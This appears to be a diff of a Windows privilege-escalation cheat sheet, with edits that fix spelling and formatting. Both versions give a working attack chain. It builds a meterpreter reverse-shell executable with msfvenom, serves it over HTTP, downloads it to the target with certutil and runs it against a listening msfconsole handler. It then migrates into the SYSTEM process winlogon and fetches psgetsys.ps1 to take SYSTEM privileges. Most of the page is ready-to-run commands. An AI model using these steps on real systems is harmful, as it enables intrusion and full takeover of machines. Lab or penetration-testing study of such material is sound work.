 Skip to content

-msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-ADRESS] LPORT=9001 -f exe -o rev.exe
+msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=[IP-ADDRESS] LPORT=9001 -f exe -o rev.exe

-NOTE: Host the Payload Using Python python -m http.server 80
+Note: Host the payload using Python: python -m http.server 80

-certutil -urlcache -f http://[IP-ADRESS]:80/rev.exe rev.exe
+certutil -urlcache -f http://[IP-ADDRESS]:80/rev.exe rev.exe

 msfconsole -x "use exploit/multi/handler; set payload windows/x64/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 9001; run"

-4. Execute the Payload:
+4. Execute the payload on the target:

 .\rev.exe

-5. Find a SYSTEM Process (e.g., winlogon.exe):
+5. Identify a SYSTEM process (e.g., winlogon.exe):

 ps winlogon

-migrate [PID] , shell
+migrate [PID]

-1. Download psgetsys.ps1 Script
+1. Download psgetsys.ps1:

 wget https://raw.githubusercontent.com/decoder-it/psgetsystem/master/psgetsys.ps1

-certutil -urlcache -f http://[IP-ADRESS]:80/psgetsys.ps1 psgetsys.ps1
+certutil -urlcache -f http://[IP-ADDRESS]:80/psgetsys.ps1 psgetsys.ps1

-3. Identify a SYSTEM Process (e.g., winlogon.exe PID 548).
+3. Identify a SYSTEM process (e.g., winlogon.exe):

 (Get-WmiObject Win32_Process -Filter "Name='winlogon.exe'").ProcessId